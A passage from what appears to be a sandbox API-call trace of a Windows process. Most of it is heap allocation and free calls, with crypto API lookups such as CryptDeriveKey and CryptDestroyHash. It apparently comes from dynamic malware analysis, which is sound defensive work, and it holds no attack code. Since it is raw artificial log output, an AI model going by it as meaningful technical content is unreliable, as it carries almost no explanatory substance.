dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0136.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0136.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0136.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0136.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0136.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0136.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0136.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0136.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0136.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0136.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0136.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0136.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c08 | out: hHeap=0x970000) returned 1 [0136.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0136.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0136.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0136.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0136.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0136.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0136.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0136.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0136.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0136.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0136.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0136.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0136.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0136.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0136.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0136.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0136.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0136.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0136.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0136.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0136.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0136.932] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0136.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0136.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0136.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0136.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0136.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0136.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0136.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0136.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0136.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0136.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0136.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0136.933] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0136.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0136.933] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0136.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0136.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0136.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0136.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0136.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0136.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0136.933] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0136.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0136.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0136.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50b18 [0136.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0136.933] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0136.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0136.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0136.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0136.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0136.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0136.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0136.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0136.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0136.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0136.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0136.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0136.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0136.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0136.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0136.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0136.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0136.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0136.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0136.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0136.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0136.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0136.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0136.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0136.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0136.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0136.934] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0136.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0136.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0136.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ae8 [0136.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0136.934] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0136.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0136.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0136.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0136.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0136.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0136.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0136.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0136.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0136.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0136.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0136.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0136.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0136.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0136.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0136.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0136.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0136.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0136.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0136.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0136.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0136.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0136.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0136.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0136.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0136.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0136.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0136.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0136.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0136.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0136.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0136.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0136.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0136.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0136.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0136.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0136.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0136.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0136.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0136.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0136.936] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0136.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0136.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0136.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0136.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0136.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0136.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0136.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0136.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0136.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0136.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0136.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0136.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0136.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0136.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0136.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0136.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0136.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0136.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0136.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0136.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0136.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0136.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0136.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0136.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0136.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0136.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0136.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0136.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0136.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0136.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0136.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0136.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0136.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0136.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0136.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0136.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0136.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0136.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0136.937] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0136.937] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e50bf0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0136.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0136.937] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0136.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0136.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0136.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0136.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0136.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0136.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0136.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0136.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0136.938] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87250, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87510) returned 1 [0136.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0136.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0136.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0136.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0136.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0136.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0136.938] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0136.938] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0136.938] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0136.938] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0136.938] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0136.938] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0136.938] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0136.938] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0136.938] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0136.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0136.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0136.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0136.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0136.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0136.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0136.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0136.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0136.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0136.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0136.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0136.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0136.939] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e69a08 [0136.939] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69a08, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0136.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0136.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0136.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0136.940] CryptDestroyHash (hHash=0xa87250) returned 1 [0136.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0136.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0136.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0136.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0136.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0136.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0136.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0136.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0136.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0136.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0136.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0136.940] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0136.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0136.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0136.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0136.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 